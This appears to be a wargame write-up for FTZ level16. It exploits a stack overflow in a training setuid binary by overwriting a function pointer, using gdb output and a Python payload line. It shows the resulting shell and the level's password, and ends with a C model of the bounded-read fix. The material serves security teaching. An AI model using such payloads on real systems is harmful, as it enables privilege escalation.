[FTZ] level16 Solution
Problem
Account: level16 / about to cause mass
hint
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setreuid() */

void shell() {
    setreuid(3097, 3097);
    system("/bin/sh");
}

void printit() {
    printf("Hello there!\n");
}

int main()
{
    int crap;
    void (*call)() = printit;   /* function pointer, initially printit */
    char buf[20];
    fgets(buf, 48, stdin);      /* reads up to 47 bytes into a 20-byte buffer */
    call();
}
Solution
The call variable holds the address of the printit function; if that value is overwritten so that shell() is called instead, we obtain a shell.
First, run gdb.
[level16@ftz tmp]$ gdb -q attackme
(gdb) set disass intel
(gdb) disas main
Dump of assembler code for function main:
0x08048518 <main+0>: push ebp
0x08048519 <main+1>: mov ebp,esp
0x0804851b <main+3>: sub esp,0x38
0x0804851e <main+6>: mov DWORD PTR [ebp-16],0x8048500 // stores printit's address in call
0x08048525 <main+13>: sub esp,0x4
0x08048528 <main+16>: push ds:0x80496e8
0x0804852e <main+22>: push 0x30
0x08048530 <main+24>: lea eax,[ebp-56] // address of buf
0x08048533 <main+27>: push eax
0x08048534 <main+28>: call 0x8048384 <fgets>
0x08048539 <main+33>: add esp,0x10
0x0804853c <main+36>: mov eax,DWORD PTR [ebp-16]
0x0804853f <main+39>: call eax
0x08048541 <main+41>: leave
0x08048542 <main+42>: ret
End of assembler dump.
The call variable sits at ebp-16 and is loaded with the address 0x8048500.
The buf variable sits at ebp-56.
First, let's check the addresses of the functions.
(gdb) b main
Breakpoint 1 at 0x804851e
(gdb) run
Starting program: /home/level16/tmp/attackme
Breakpoint 1, 0x0804851e in main ()
(gdb) p printit
$1 = {<text variable, no debug info>} 0x8048500 <printit>
(gdb) p shell
$2 = {<text variable, no debug info>} 0x80484d0 <shell>
The check confirms that printit is at 0x8048500 and shell is at 0x80484d0.
Now we overwrite the call variable using the buffer overflow.
There are 40 bytes between buf and call, so we fill 40 bytes and then write the address of shell after them.
[level16@ftz level16]$ (python -c 'print("A"*40+"\xd0\x84\x04\x08")';cat) | ./attackme
id
uid=3097(level17) gid=3096(level16) groups=3096(level16)
my-pass
Level17 Password is "king poetic".
We got the shell.
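As an added example (not part of the original writeup), the frame layout above modelled in C: a read of 48 bytes reaches the call slot 40 bytes past buf, while a read bounded by sizeof buf (20) leaves it untouched. The offsets and printit's address come from the disassembly on this page; the 'B' marker bytes are constructed, not a real address.

```c
#include <stdint.h>
#include <string.h>

/* Frame layout from the page's disassembly (x86, 32-bit): buf at ebp-56
 * (offset 0 here), call at ebp-16 (offset 40), so 40 input bytes reach
 * the function pointer. A byte array stands in for the real stack. */
#define FRAME_SIZE   56
#define BUF_SIZE     20
#define CALL_OFF     40
#define PRINTIT_ADDR 0x08048500u  /* "p printit" on this page */

/* fgets(dst, n, stream) on an in-memory input: stores at most n-1 bytes,
 * stops after a newline, always NUL-terminates. */
static size_t fgets_like(unsigned char *dst, size_t n,
                         const char *src, size_t srclen) {
    size_t i = 0;
    while (i + 1 < n && i < srclen) {
        dst[i] = (unsigned char)src[i];
        i++;
        if (src[i - 1] == '\n') break;
    }
    dst[i] = '\0';
    return i;
}

/* One read into a fresh frame whose call slot holds printit's address;
 * returns the slot (little-endian) afterwards. read_size is fgets' second
 * argument: 48 as in attackme, or sizeof buf (20) for the corrected read. */
static uint32_t run_read(size_t read_size, const char *input, size_t inlen) {
    unsigned char frame[FRAME_SIZE];
    uint32_t call = PRINTIT_ADDR;
    memset(frame, 0, sizeof frame);
    memcpy(frame + CALL_OFF, &call, sizeof call);
    fgets_like(frame, read_size, input, inlen);
    memcpy(&call, frame + CALL_OFF, sizeof call);
    return call;
}

/* Runs a constructed 44-byte line (40 filler bytes, then four 'B' marker
 * bytes, 0x42424242, not a real address) through a read of read_size. */
static uint32_t call_after_read(size_t read_size) {
    char in[44];
    memset(in, 'A', 40);
    memset(in + 40, 'B', 4);
    return run_read(read_size, in, sizeof in);
}
```

call_after_read(48) returns 0x42424242 (the slot was overwritten), call_after_read(BUF_SIZE) returns 0x08048500 (the slot survives), which is why the fix is fgets(buf, sizeof buf, stdin).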